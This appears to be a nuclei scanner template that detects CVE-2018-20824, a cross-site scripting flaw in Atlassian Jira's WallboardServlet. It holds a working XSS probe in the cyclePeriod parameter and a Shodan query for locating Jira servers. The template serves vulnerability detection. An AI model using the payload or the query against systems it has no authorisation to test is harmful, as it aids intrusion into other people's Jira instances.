nuclei-templates/cves/2018/CVE-2018-20824.yaml

35 lines
1.1 KiB
YAML

id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting
author: madrobot,dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.
reference:
- https://jira.atlassian.com/browse/JRASERVER-69238
- https://nvd.nist.gov/vuln/detail/CVE-2018-20824
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-20824
cwe-id: CWE-79
metadata:
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2018,atlassian,jira,xss
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- (?mi)timeout:\salert\(document\.domain\)
part: body
# Enhanced by mp on 2022/08/10